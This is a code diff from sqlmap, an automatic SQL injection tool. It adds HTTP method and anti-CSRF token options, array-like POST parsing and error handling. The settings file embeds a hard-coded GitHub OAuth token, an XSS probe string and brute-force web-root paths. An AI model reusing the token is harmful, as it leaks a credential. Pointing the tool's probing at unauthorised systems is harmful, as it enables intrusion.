if conf.scope:
|
||||
logger.info("using regular expression '%s' for filtering targets" % conf.scope)
|
||||
|
@ -400,7 +409,13 @@ def _loadQueries():
|
|||
return retVal
|
||||
|
||||
tree = ElementTree()
|
||||
tree.parse(paths.QUERIES_XML)
|
||||
try:
|
||||
tree.parse(paths.QUERIES_XML)
|
||||
except Exception, ex:
|
||||
errMsg = "something seems to be wrong with "
|
||||
errMsg += "the file '%s' ('%s'). Please make " % (paths.QUERIES_XML, ex)
|
||||
errMsg += "sure that you haven't made any changes to it"
|
||||
raise SqlmapInstallationException, errMsg
|
||||
|
||||
for node in tree.findall("*"):
|
||||
queries[node.attrib['value']] = iterate(node)
|
||||
|
@ -560,14 +575,14 @@ def _setGoogleDorking():
|
|||
for link in links:
|
||||
link = urldecode(link)
|
||||
if re.search(r"(.*?)\?(.+)", link):
|
||||
kb.targets.add((link, conf.method, conf.data, conf.cookie))
|
||||
kb.targets.add((link, conf.method, conf.data, conf.cookie, None))
|
||||
elif re.search(URI_INJECTABLE_REGEX, link, re.I):
|
||||
if kb.data.onlyGETs is None and conf.data is None and not conf.googleDork:
|
||||
message = "do you want to scan only results containing GET parameters? [Y/n] "
|
||||
test = readInput(message, default="Y")
|
||||
kb.data.onlyGETs = test.lower() != 'n'
|
||||
if not kb.data.onlyGETs or conf.googleDork:
|
||||
kb.targets.add((link, conf.method, conf.data, conf.cookie))
|
||||
kb.targets.add((link, conf.method, conf.data, conf.cookie, None))
|
||||
|
||||
return links
|
||||
|
||||
|
@ -617,7 +632,7 @@ def _setBulkMultipleTargets():
|
|||
for line in getFileItems(conf.bulkFile):
|
||||
if re.match(r"[^ ]+\?(.+)", line, re.I) or CUSTOM_INJECTION_MARK_CHAR in line:
|
||||
found = True
|
||||
kb.targets.add((line.strip(), None, None, None))
|
||||
kb.targets.add((line.strip(), None, None, None, None))
|
||||
|
||||
if not found and not conf.forms and not conf.crawlDepth:
|
||||
warnMsg = "no usable links found (with GET parameters)"
|
||||
|
@ -634,7 +649,7 @@ def _setSitemapTargets():
|
|||
for item in parseSitemap(conf.sitemapUrl):
|
||||
if re.match(r"[^ ]+\?(.+)", item, re.I):
|
||||
found = True
|
||||
kb.targets.add((item.strip(), None, None, None))
|
||||
kb.targets.add((item.strip(), None, None, None, None))
|
||||
|
||||
if not found and not conf.forms and not conf.crawlDepth:
|
||||
warnMsg = "no usable links found (with GET parameters)"
|
||||
|
@ -933,13 +948,13 @@ def _setTamperingFunctions():
|
|||
|
||||
try:
|
||||
module = __import__(filename[:-3])
|
||||
except ImportError, msg:
|
||||
except (ImportError, SyntaxError), msg:
|
||||
raise SqlmapSyntaxException("cannot import tamper script '%s' (%s)" % (filename[:-3], msg))
|
||||
|
||||
priority = PRIORITY.NORMAL if not hasattr(module, '__priority__') else module.__priority__
|
||||
|
||||
for name, function in inspect.getmembers(module, inspect.isfunction):
|
||||
if name == "tamper":
|
||||
if name == "tamper" and inspect.getargspec(function).args and inspect.getargspec(function).keywords == "kwargs":
|
||||
found = True
|
||||
kb.tamperFunctions.append(function)
|
||||
function.func_name = module.__name__
|
||||
|
@ -998,13 +1013,15 @@ def _setWafFunctions():
|
|||
sys.path.insert(0, dirname)
|
||||
|
||||
try:
|
||||
if filename[:-3] in sys.modules:
|
||||
del sys.modules[filename[:-3]]
|
||||
module = __import__(filename[:-3])
|
||||
except ImportError, msg:
|
||||
raise SqlmapSyntaxException("cannot import WAF script '%s' (%s)" % (filename[:-3], msg))
|
||||
|
||||
_ = dict(inspect.getmembers(module))
|
||||
if "detect" not in _:
|
||||
errMsg = "missing function 'detect(page, headers, code)' "
|
||||
errMsg = "missing function 'detect(get_page)' "
|
||||
errMsg += "in WAF script '%s'" % found
|
||||
raise SqlmapGenericException(errMsg)
|
||||
else:
|
||||
|
@ -1241,16 +1258,6 @@ def _setHTTPAuthentication():
|
|||
checkFile(key_file)
|
||||
authHandler = HTTPSPKIAuthHandler(key_file)
|
||||
|
||||
def _setHTTPMethod():
|
||||
"""
|
||||
Check and set the HTTP method to perform HTTP requests through.
|
||||
"""
|
||||
|
||||
conf.method = HTTPMETHOD.POST if conf.data is not None else HTTPMETHOD.GET
|
||||
|
||||
debugMsg = "setting the HTTP method to %s" % conf.method
|
||||
logger.debug(debugMsg)
|
||||
|
||||
def _setHTTPExtraHeaders():
|
||||
if conf.headers:
|
||||
debugMsg = "setting extra HTTP headers"
|
||||
|
@ -1640,8 +1647,8 @@ def _setKnowledgeBaseAttributes(flushAll=True):
|
|||
|
||||
kb.chars = AttribDict()
|
||||
kb.chars.delimiter = randomStr(length=6, lowercase=True)
|
||||
kb.chars.start = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, lowercase=True), KB_CHARS_BOUNDARY_CHAR)
|
||||
kb.chars.stop = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, lowercase=True), KB_CHARS_BOUNDARY_CHAR)
|
||||
kb.chars.start = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, alphabet=KB_CHARS_LOW_FREQUENCY_ALPHABET), KB_CHARS_BOUNDARY_CHAR)
|
||||
kb.chars.stop = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, alphabet=KB_CHARS_LOW_FREQUENCY_ALPHABET), KB_CHARS_BOUNDARY_CHAR)
|
||||
kb.chars.at, kb.chars.space, kb.chars.dollar, kb.chars.hash_ = ("%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, _, KB_CHARS_BOUNDARY_CHAR) for _ in randomStr(length=4, lowercase=True))
|
||||
|
||||
kb.columnExistsChoice = None
|
||||
|
@ -1736,6 +1743,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
|
|||
kb.reduceTests = None
|
||||
kb.stickyDBMS = False
|
||||
kb.stickyLevel = None
|
||||
kb.storeCrawlingChoice = None
|
||||
kb.storeHashesChoice = None
|
||||
kb.suppressResumeInfo = False
|
||||
kb.technique = None
|
||||
|
@ -1778,11 +1786,11 @@ def _useWizardInterface():
|
|||
message = "Please enter full target URL (-u): "
|
||||
conf.url = readInput(message, default=None)
|
||||
|
||||
message = "POST data (--data) [Enter for None]: "
|
||||
message = "%s data (--data) [Enter for None]: " % ((conf.method if conf.method != HTTPMETHOD.GET else conf.method) or HTTPMETHOD.POST)
|
||||
conf.data = readInput(message, default=None)
|
||||
|
||||
if not (filter(lambda _: '=' in unicode(_), (conf.url, conf.data)) or '*' in conf.url):
|
||||
warnMsg = "no GET and/or POST parameter(s) found for testing "
|
||||
warnMsg = "no GET and/or %s parameter(s) found for testing " % ((conf.method if conf.method != HTTPMETHOD.GET else conf.method) or HTTPMETHOD.POST)
|
||||
warnMsg += "(e.g. GET parameter 'id' in 'http://www.site.com/vuln.php?id=1'). "
|
||||
if not conf.crawlDepth and not conf.forms:
|
||||
warnMsg += "Will search for forms"
|
||||
|
@ -2176,6 +2184,14 @@ def _basicOptionValidation():
|
|||
errMsg = "switch '--forms' requires usage of option '-u' ('--url'), '-g', '-m' or '-x'"
|
||||
raise SqlmapSyntaxException(errMsg)
|
||||
|
||||
if conf.csrfUrl and not conf.csrfToken:
|
||||
errMsg = "option '--csrf-url' requires usage of option '--csrf-token'"
|
||||
raise SqlmapSyntaxException(errMsg)
|
||||
|
||||
if conf.csrfToken and conf.threads > 1:
|
||||
errMsg = "option '--csrf-url' is incompatible with option '--threads'"
|
||||
raise SqlmapSyntaxException(errMsg)
|
||||
|
||||
if conf.requestFile and conf.url and conf.url != DUMMY_URL:
|
||||
errMsg = "option '-r' is incompatible with option '-u' ('--url')"
|
||||
raise SqlmapSyntaxException(errMsg)
|
||||
|
@ -2270,7 +2286,7 @@ def _resolveCrossReferences():
|
|||
lib.controller.checks.setVerbosity = setVerbosity
|
||||
|
||||
def initOptions(inputOptions=AttribDict(), overrideOptions=False):
|
||||
if not inputOptions.disableColoring:
|
||||
if IS_WIN:
|
||||
coloramainit()
|
||||
|
||||
_setConfAttributes()
|
||||
|
@ -2310,7 +2326,6 @@ def init():
|
|||
_setHTTPCookies()
|
||||
_setHTTPReferer()
|
||||
_setHTTPUserAgent()
|
||||
_setHTTPMethod()
|
||||
_setHTTPAuthentication()
|
||||
_setHTTPProxy()
|
||||
_setDNSCache()
|
||||
|
|
|
@ -23,6 +23,7 @@ optDict = {
|
|||
},
|
||||
|
||||
"Request": {
|
||||
"method": "string",
|
||||
"data": "string",
|
||||
"paramDel": "string",
|
||||
"cookie": "string",
|
||||
|
@ -52,6 +53,8 @@ optDict = {
|
|||
"safUrl": "string",
|
||||
"saFreq": "integer",
|
||||
"skipUrlEncode": "boolean",
|
||||
"csrfToken": "string",
|
||||
"csrfUrl": "string",
|
||||
"forceSSL": "boolean",
|
||||
"hpp": "boolean",
|
||||
"evalCode": "string",
|
||||
|
|
|
@ -26,6 +26,7 @@ DESCRIPTION = "automatic SQL injection and database takeover tool"
|
|||
SITE = "http://sqlmap.org"
|
||||
ISSUES_PAGE = "https://github.com/sqlmapproject/sqlmap/issues/new"
|
||||
GIT_REPOSITORY = "git://github.com/sqlmapproject/sqlmap.git"
|
||||
GIT_PAGE = "https://github.com/sqlmapproject/sqlmap"
|
||||
ML = "sqlmap-users@lists.sourceforge.net"
|
||||
|
||||
# colorful banner
|
||||
|
@ -33,7 +34,7 @@ BANNER = """\033[01;33m _
|
|||
___ ___| |_____ ___ ___ \033[01;37m{\033[01;%dm%s\033[01;37m}\033[01;33m
|
||||
|_ -| . | | | .'| . |
|
||||
|___|_ |_|_|_|_|__,| _|
|
||||
|_| |_| \033[0m\033[4m%s\033[0m\n
|
||||
|_| |_| \033[0m\033[4;37m%s\033[0m\n
|
||||
""" % ((31 + hash(REVISION) % 6) if REVISION else 30, VERSION_STRING.split('/')[-1], SITE)
|
||||
|
||||
# Minimum distance of ratio from kb.matchRatio to result in True
|
||||
|
@ -473,6 +474,9 @@ DEFAULT_COOKIE_DELIMITER = ';'
|
|||
# Unix timestamp used for forcing cookie expiration when provided with --load-cookies
|
||||
FORCE_COOKIE_EXPIRATION_TIME = "9999999999"
|
||||
|
||||
# Github OAuth token used for creating an automatic Issue for unhandled exceptions
|
||||
GITHUB_REPORT_OAUTH_TOKEN = "d6c0c7bf3f2298a7b85f82176c46d2f8d494fcc5"
|
||||
|
||||
# Skip unforced HashDB flush requests below the threshold number of cached items
|
||||
HASHDB_FLUSH_THRESHOLD = 32
|
||||
|
||||
|
@ -509,6 +513,9 @@ DNS_BOUNDARIES_ALPHABET = re.sub("[a-fA-F]", "", string.ascii_letters)
|
|||
# Alphabet used for heuristic checks
|
||||
HEURISTIC_CHECK_ALPHABET = ('"', '\'', ')', '(', '[', ']', ',', '.')
|
||||
|
||||
# String used for dummy XSS check of a tested parameter value
|
||||
DUMMY_XSS_CHECK_APPENDIX = "<'\">"
|
||||
|
||||
# Connection chunk size (processing large responses in chunks to avoid MemoryError crashes - e.g. large table dump in full UNION injections)
|
||||
MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024
|
||||
|
||||
|
@ -531,7 +538,7 @@ VALID_TIME_CHARS_RUN_THRESHOLD = 100
|
|||
CHECK_ZERO_COLUMNS_THRESHOLD = 10
|
||||
|
||||
# Boldify all logger messages containing these "patterns"
|
||||
BOLD_PATTERNS = ("' injectable", "might be injectable", "' is vulnerable", "is not injectable", "test failed", "test passed", "live test final result", "test shows that")
|
||||
BOLD_PATTERNS = ("' injectable", "might be injectable", "' is vulnerable", "is not injectable", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github")
|
||||
|
||||
# Generic www root directory names
|
||||
GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "wwwroot", "www")
|
||||
|
@ -543,7 +550,7 @@ MAX_HELP_OPTION_LENGTH = 18
|
|||
MAX_CONNECT_RETRIES = 100
|
||||
|
||||
# Strings for detecting formatting errors
|
||||
FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Failed to convert", "System.FormatException", "java.lang.NumberFormatException")
|
||||
FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Failed to convert", "System.FormatException", "java.lang.NumberFormatException", "ValueError: invalid literal")
|
||||
|
||||
# Regular expression used for extracting ASP.NET view state values
|
||||
VIEWSTATE_REGEX = r'(?i)(?P<name>__VIEWSTATE[^"]*)[^>]+value="(?P<result>[^"]+)'
|
||||
|
@ -569,6 +576,9 @@ JSON_LIKE_RECOGNITION_REGEX = r"(?s)\A(\s*\[)*\s*\{.*'[^']+'\s*:\s*('[^']+'|\d+)
|
|||
# Regular expression used for detecting multipart POST data
|
||||
MULTIPART_RECOGNITION_REGEX = r"(?i)Content-Disposition:[^;]+;\s*name="
|
||||
|
||||
# Regular expression used for detecting Array-like POST data
|
||||
ARRAY_LIKE_RECOGNITION_REGEX = r"(\A|%s)(\w+)\[\]=.+%s\2\[\]=" % (DEFAULT_GET_POST_DELIMITER, DEFAULT_GET_POST_DELIMITER)
|
||||
|
||||
# Default POST data content-type
|
||||
DEFAULT_CONTENT_TYPE = "application/x-www-form-urlencoded; charset=utf-8"
|
||||
|
||||
|
@ -596,6 +606,9 @@ METASPLOIT_SESSION_TIMEOUT = 300
|
|||
# Reference: http://www.cookiecentral.com/faq/#3.5
|
||||
NETSCAPE_FORMAT_HEADER_COOKIES = "# Netscape HTTP Cookie File."
|
||||
|
||||
# Infixes used for automatic recognition of parameters carrying anti-CSRF tokens
|
||||
CSRF_TOKEN_PARAMETER_INFIXES = ("csrf", "xsrf")
|
||||
|
||||
# Prefixes used in brute force search for web server document root
|
||||
BRUTE_DOC_ROOT_PREFIXES = {
|
||||
OS.LINUX: ("/var/www", "/usr/local/apache", "/usr/local/apache2", "/usr/local/www/apache22", "/usr/local/www/apache24", "/usr/local/httpd", "/var/www/nginx-default", "/srv/www", "/var/www/%TARGET%", "/var/www/vhosts/%TARGET%", "/var/www/virtual/%TARGET%", "/var/www/clients/vhosts/%TARGET%", "/var/www/clients/virtual/%TARGET%"),
|
||||
|
@ -611,6 +624,9 @@ BRUTE_DOC_ROOT_TARGET_MARK = "%TARGET%"
|
|||
# Character used as a boundary in kb.chars (preferably less frequent letter)
|
||||
KB_CHARS_BOUNDARY_CHAR = 'q'
|
||||
|
||||
# Letters of lower frequency used in kb.chars
|
||||
KB_CHARS_LOW_FREQUENCY_ALPHABET = "zqxjkvbp"
|
||||
|
||||
# CSS style used in HTML dump format
|
||||
HTML_DUMP_CSS_STYLE = """<style>
|
||||
table{
|
||||
|
|
|
@ -17,6 +17,7 @@ from lib.core.common import Backend
|
|||
from lib.core.common import getUnicode
|
||||
from lib.core.common import hashDBRetrieve
|
||||
from lib.core.common import intersect
|
||||
from lib.core.common import normalizeUnicode
|
||||
from lib.core.common import paramToDict
|
||||
from lib.core.common import readInput
|
||||
from lib.core.common import resetCookieJar
|
||||
|
@ -43,8 +44,11 @@ from lib.core.option import _setDBMS
|
|||
from lib.core.option import _setKnowledgeBaseAttributes
|
||||
from lib.core.option import _setAuthCred
|
||||
from lib.core.settings import ASTERISK_MARKER
|
||||
from lib.core.settings import CSRF_TOKEN_PARAMETER_INFIXES
|
||||
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
|
||||
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
||||
from lib.core.settings import HOST_ALIASES
|
||||
from lib.core.settings import ARRAY_LIKE_RECOGNITION_REGEX
|
||||
from lib.core.settings import JSON_RECOGNITION_REGEX
|
||||
from lib.core.settings import JSON_LIKE_RECOGNITION_REGEX
|
||||
from lib.core.settings import MULTIPART_RECOGNITION_REGEX
|
||||
|
@ -132,6 +136,12 @@ def _setRequestParams():
|
|||
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
|
||||
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*"[^"]+)"', functools.partial(process, repl=r'\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR), conf.data)
|
||||
conf.data = re.sub(r'("(?P<name>[^"]+)"\s*:\s*)(-?\d[\d\.]*\b)', functools.partial(process, repl=r'\g<0>%s' % CUSTOM_INJECTION_MARK_CHAR), conf.data)
|
||||
match = re.search(r'(?P<name>[^"]+)"\s*:\s*\[([^\]]+)\]', conf.data)
|
||||
if match and not (conf.testParameter and match.group("name") not in conf.testParameter):
|
||||
_ = match.group(2)
|
||||
_ = re.sub(r'("[^"]+)"', '\g<1>%s"' % CUSTOM_INJECTION_MARK_CHAR, _)
|
||||
_ = re.sub(r'(\A|,|\s+)(-?\d[\d\.]*\b)', '\g<0>%s' % CUSTOM_INJECTION_MARK_CHAR, _)
|
||||
conf.data = conf.data.replace(match.group(0), match.group(0).replace(match.group(2), _))
|
||||
kb.postHint = POST_HINT.JSON
|
||||
|
||||
elif re.search(JSON_LIKE_RECOGNITION_REGEX, conf.data):
|
||||
|
@ -146,6 +156,17 @@ def _setRequestParams():
|
|||
conf.data = re.sub(r"('(?P<name>[^']+)'\s*:\s*)(-?\d[\d\.]*\b)", functools.partial(process, repl=r"\g<0>%s" % CUSTOM_INJECTION_MARK_CHAR), conf.data)
|
||||
kb.postHint = POST_HINT.JSON_LIKE
|
||||
|
||||
elif re.search(ARRAY_LIKE_RECOGNITION_REGEX, conf.data):
|
||||
message = "Array-like data found in %s data. " % conf.method
|
||||
message += "Do you want to process it? [Y/n/q] "
|
||||
test = readInput(message, default="Y")
|
||||
if test and test[0] in ("q", "Q"):
|
||||
raise SqlmapUserQuitException
|
||||
elif test[0] not in ("n", "N"):
|
||||
conf.data = conf.data.replace(CUSTOM_INJECTION_MARK_CHAR, ASTERISK_MARKER)
|
||||
conf.data = re.sub(r"(=[^%s]+)" % DEFAULT_GET_POST_DELIMITER, r"\g<1>%s" % CUSTOM_INJECTION_MARK_CHAR, conf.data)
|
||||
kb.postHint = POST_HINT.ARRAY_LIKE
|
||||
|
||||
elif re.search(XML_RECOGNITION_REGEX, conf.data):
|
||||
message = "SOAP/XML data found in %s data. " % conf.method
|
||||
message += "Do you want to process it? [Y/n/q] "
|
||||
|
@ -325,6 +346,22 @@ def _setRequestParams():
|
|||
errMsg += "within the given request data"
|
||||
raise SqlmapGenericException(errMsg)
|
||||
|
||||
if conf.csrfToken:
|
||||
if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not conf.csrfToken in set(_[0].lower() for _ in conf.httpHeaders) and not conf.csrfToken in conf.paramDict.get(PLACE.COOKIE, {}):
|
||||
errMsg = "anti-CSRF token parameter '%s' not " % conf.csrfToken
|
||||
errMsg += "found in provided GET, POST, Cookie or header values"
|
||||
raise SqlmapGenericException(errMsg)
|
||||
else:
|
||||
for place in (PLACE.GET, PLACE.POST, PLACE.COOKIE):
|
||||
for parameter in conf.paramDict.get(place, {}):
|
||||
if any(parameter.lower().count(_) for _ in CSRF_TOKEN_PARAMETER_INFIXES):
|
||||
message = "%s parameter '%s' appears to hold anti-CSRF token. " % (place, parameter)
|
||||
message += "Do you want sqlmap to automatically update it in further requests? [y/N] "
|
||||
test = readInput(message, default="N")
|
||||
if test and test[0] in ("y", "Y"):
|
||||
conf.csrfToken = parameter
|
||||
break
|
||||
|
||||
def _setHashDB():
|
||||
"""
|
||||
Check and set the HashDB SQLite file for query resume functionality.
|
||||
|
@ -528,8 +565,15 @@ def _createTargetDirs():
|
|||
os.makedirs(paths.SQLMAP_OUTPUT_PATH, 0755)
|
||||
warnMsg = "using '%s' as the output directory" % paths.SQLMAP_OUTPUT_PATH
|
||||
logger.warn(warnMsg)
|
||||
except OSError, ex:
|
||||
tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
|
||||
except OSError, ex:
|
||||
try:
|
||||
tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
|
||||
except IOError, _:
|
||||
errMsg = "unable to write to the temporary directory ('%s'). " % _
|
||||
errMsg += "Please make sure that your disk is not full and "
|
||||
errMsg += "that you have sufficient write permissions to "
|
||||
errMsg += "create temporary files and/or directories"
|
||||
raise SqlmapGenericException(errMsg)
|
||||
warnMsg = "unable to create regular output directory "
|
||||
warnMsg += "'%s' (%s). " % (paths.SQLMAP_OUTPUT_PATH, ex)
|
||||
warnMsg += "Using temporary directory '%s' instead" % tempDir
|
||||
|
@ -537,13 +581,20 @@ def _createTargetDirs():
|
|||
|
||||
paths.SQLMAP_OUTPUT_PATH = tempDir
|
||||
|
||||
conf.outputPath = os.path.join(getUnicode(paths.SQLMAP_OUTPUT_PATH), getUnicode(conf.hostname))
|
||||
conf.outputPath = os.path.join(getUnicode(paths.SQLMAP_OUTPUT_PATH), normalizeUnicode(getUnicode(conf.hostname)))
|
||||
|
||||
if not os.path.isdir(conf.outputPath):
|
||||
try:
|
||||
os.makedirs(conf.outputPath, 0755)
|
||||
except OSError, ex:
|
||||
tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
|
||||
try:
|
||||
tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
|
||||
except IOError, _:
|
||||
errMsg = "unable to write to the temporary directory ('%s'). " % _
|
||||
errMsg += "Please make sure that your disk is not full and "
|
||||
errMsg += "that you have sufficient write permissions to "
|
||||
errMsg += "create temporary files and/or directories"
|
||||
raise SqlmapGenericException(errMsg)
|
||||
warnMsg = "unable to create output directory "
|
||||
warnMsg += "'%s' (%s). " % (conf.outputPath, ex)
|
||||
warnMsg += "Using temporary directory '%s' instead" % tempDir
|
||||
|
|
|
@ -285,7 +285,7 @@ def runCase(parse):
|
|||
elif result is False: # this means no SQL injection has been detected - if None, ignore
|
||||
retVal = False
|
||||
|
||||
console = getUnicode(console, system=True)
|
||||
console = getUnicode(console, encoding=sys.stdin.encoding)
|
||||
|
||||
if parse and retVal:
|
||||
with codecs.open(conf.dumper.getOutputFile(), "rb", UNICODE_ENCODING) as f:
|
||||
|
|
|
@ -106,7 +106,7 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
|
|||
kb.threadContinue = True
|
||||
kb.threadException = False
|
||||
|
||||
if threadChoice and numThreads == 1 and any(_ in kb.injection.data for _ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY, PAYLOAD.TECHNIQUE.UNION)):
|
||||
if threadChoice and numThreads == 1 and not (kb.injection.data and not any(_ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in kb.injection.data)):
|
||||
while True:
|
||||
message = "please enter number of threads? [Enter for %d (current)] " % numThreads
|
||||
choice = readInput(message, default=str(numThreads))
|
||||
|
@ -115,11 +115,11 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
|
|||
errMsg = "maximum number of used threads is %d avoiding potential connection issues" % MAX_NUMBER_OF_THREADS
|
||||
logger.critical(errMsg)
|
||||
else:
|
||||
numThreads = int(choice)
|
||||
conf.threads = numThreads = int(choice)
|
||||
break
|
||||
|
||||
if numThreads == 1:
|
||||
warnMsg = "running in a single-thread mode. This could take a while."
|
||||
warnMsg = "running in a single-thread mode. This could take a while"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
try:
|
||||
|
|
|
@ -63,7 +63,7 @@ class MSSQLBannerHandler(ContentHandler):
|
|||
def endElement(self, name):
|
||||
if name == "signature":
|
||||
for version in (self._version, self._versionAlt):
|
||||
if version and re.search(r" %s[\.\ ]+" % version, self._banner):
|
||||
if version and re.search(r" %s[\.\ ]+" % re.escape(version), self._banner):
|
||||
self._feedInfo("dbmsRelease", self._release)
|
||||
self._feedInfo("dbmsVersion", self._version)
|
||||
self._feedInfo("dbmsServicePack", self._servicePack)
|
||||
|
|
|
@ -41,7 +41,7 @@ def cmdLineParser():
|
|||
|
||||
checkSystemEncoding()
|
||||
|
||||
_ = os.path.normpath(sys.argv[0])
|
||||
_ = getUnicode(os.path.normpath(sys.argv[0]), encoding=sys.getfilesystemencoding())
|
||||
|
||||
usage = "%s%s [options]" % ("python " if not IS_WIN else "", \
|
||||
"\"%s\"" % _ if " " in _ else _)
|
||||
|
@ -90,6 +90,9 @@ def cmdLineParser():
|
|||
request = OptionGroup(parser, "Request", "These options can be used "
|
||||
"to specify how to connect to the target URL")
|
||||
|
||||
request.add_option("--method", dest="method",
|
||||
help="Force usage of given HTTP method (e.g. PUT)")
|
||||
|
||||
request.add_option("--data", dest="data",
|
||||
help="Data string to be sent through POST")
|
||||
|
||||
|
@ -136,6 +139,9 @@ def cmdLineParser():
|
|||
request.add_option("--auth-private", dest="authPrivate",
|
||||
help="HTTP authentication PEM private key file")
|
||||
|
||||
request.add_option("--ignore-401", dest="ignore401", action="store_true",
|
||||
help="Ignore HTTP Error 401 (Unauthorized)")
|
||||
|
||||
request.add_option("--proxy", dest="proxy",
|
||||
help="Use a proxy to connect to the target URL")
|
||||
|
||||
|
@ -187,6 +193,12 @@ def cmdLineParser():
|
|||
action="store_true",
|
||||
help="Skip URL encoding of payload data")
|
||||
|
||||
request.add_option("--csrf-token", dest="csrfToken",
|
||||
help="Parameter used to hold anti-CSRF token")
|
||||
|
||||
request.add_option("--csrf-url", dest="csrfUrl",
|
||||
help="URL address to visit to extract anti-CSRF token")
|
||||
|
||||
request.add_option("--force-ssl", dest="forceSSL",
|
||||
action="store_true",
|
||||
help="Force usage of SSL/HTTPS")
|
||||
|
@ -728,9 +740,6 @@ def cmdLineParser():
|
|||
parser.add_option("--force-dns", dest="forceDns", action="store_true",
|
||||
help=SUPPRESS_HELP)
|
||||
|
||||
parser.add_option("--ignore-401", dest="ignore401", action="store_true",
|
||||
help=SUPPRESS_HELP)
|
||||
|
||||
parser.add_option("--smoke-test", dest="smokeTest", action="store_true",
|
||||
help=SUPPRESS_HELP)
|
||||
|
||||
|
@ -782,7 +791,7 @@ def cmdLineParser():
|
|||
advancedHelp = True
|
||||
|
||||
for arg in sys.argv:
|
||||
argv.append(getUnicode(arg, system=True))
|
||||
argv.append(getUnicode(arg, encoding=sys.stdin.encoding))
|
||||
|
||||
checkDeprecatedOptions(argv)
|
||||
|
||||
|
@ -831,7 +840,7 @@ def cmdLineParser():
|
|||
break
|
||||
|
||||
for arg in shlex.split(command):
|
||||
argv.append(getUnicode(arg, system=True))
|
||||
argv.append(getUnicode(arg, encoding=sys.stdin.encoding))
|
||||
|
||||
# Hide non-basic options in basic help case
|
||||
for i in xrange(len(argv)):
|
||||
|
@ -854,6 +863,9 @@ def cmdLineParser():
|
|||
|
||||
try:
|
||||
(args, _) = parser.parse_args(argv)
|
||||
except UnicodeEncodeError, ex:
|
||||
print "\n[!] %s" % ex.object.encode("unicode-escape")
|
||||
raise SystemExit
|
||||
except SystemExit:
|
||||
if "-h" in argv and not advancedHelp:
|
||||
print "\n[!] to see full list of options run with '-hh'"
|
||||
|
|
|
@ -10,6 +10,7 @@ from xml.etree import ElementTree as et
|
|||
from lib.core.data import conf
|
||||
from lib.core.data import paths
|
||||
from lib.core.datatype import AttribDict
|
||||
from lib.core.exception import SqlmapInstallationException
|
||||
|
||||
def cleanupVals(text, tag):
|
||||
if tag in ("clause", "where"):
|
||||
|
@ -67,6 +68,13 @@ def parseXmlNode(node):
|
|||
conf.tests.append(test)
|
||||
|
||||
def loadPayloads():
|
||||
doc = et.parse(paths.PAYLOADS_XML)
|
||||
try:
|
||||
doc = et.parse(paths.PAYLOADS_XML)
|
||||
except Exception, ex:
|
||||
errMsg = "something seems to be wrong with "
|
||||
errMsg += "the file '%s' ('%s'). Please make " % (paths.PAYLOADS_XML, ex)
|
||||
errMsg += "sure that you haven't made any changes to it"
|
||||
raise SqlmapInstallationException, errMsg
|
||||
|
||||
root = doc.getroot()
|
||||
parseXmlNode(root)
|
||||
|
|
|
@ -5,11 +5,13 @@ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
|
|||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
import httplib
|
||||
import re
|
||||
|
||||
from lib.core.common import readInput
|
||||
from lib.core.data import kb
|
||||
from lib.core.data import logger
|
||||
from lib.core.exception import SqlmapSyntaxException
|
||||
from lib.request.connect import Connect as Request
|
||||
from thirdparty.oset.pyoset import oset
|
||||
|
||||
|
@ -26,8 +28,13 @@ def parseSitemap(url, retVal=None):
|
|||
abortedFlag = False
|
||||
retVal = oset()
|
||||
|
||||
content = Request.getPage(url=url, raise404=True)[0] if not abortedFlag else ""
|
||||
for match in re.finditer(r"<loc>\s*([^<]+)", content):
|
||||
try:
|
||||
content = Request.getPage(url=url, raise404=True)[0] if not abortedFlag else ""
|
||||
except httplib.InvalidURL:
|
||||
errMsg = "invalid URL given for sitemap ('%s')" % url
|
||||
raise SqlmapSyntaxException, errMsg
|
||||
|
||||
for match in re.finditer(r"<loc>\s*([^<]+)", content or ""):
|
||||
if abortedFlag:
|
||||
break
|
||||
url = match.group(1).strip()
|
||||
|
|
|
@ -38,6 +38,7 @@ from lib.parse.headers import headersParser
|
|||
from lib.parse.html import htmlParser
|
||||
from lib.utils.htmlentities import htmlEntities
|
||||
from thirdparty.chardet import detect
|
||||
from thirdparty.odict.odict import OrderedDict
|
||||
|
||||
def forgeHeaders(items=None):
|
||||
"""
|
||||
|
@ -51,8 +52,8 @@ def forgeHeaders(items=None):
|
|||
if items[_] is None:
|
||||
del items[_]
|
||||
|
||||
headers = dict(conf.httpHeaders)
|
||||
headers.update(items or {})
|
||||
headers = OrderedDict(conf.httpHeaders)
|
||||
headers.update(items.items())
|
||||
|
||||
class _str(str):
|
||||
def capitalize(self):
|
||||
|
@ -62,7 +63,7 @@ def forgeHeaders(items=None):
|
|||
return _str(self)
|
||||
|
||||
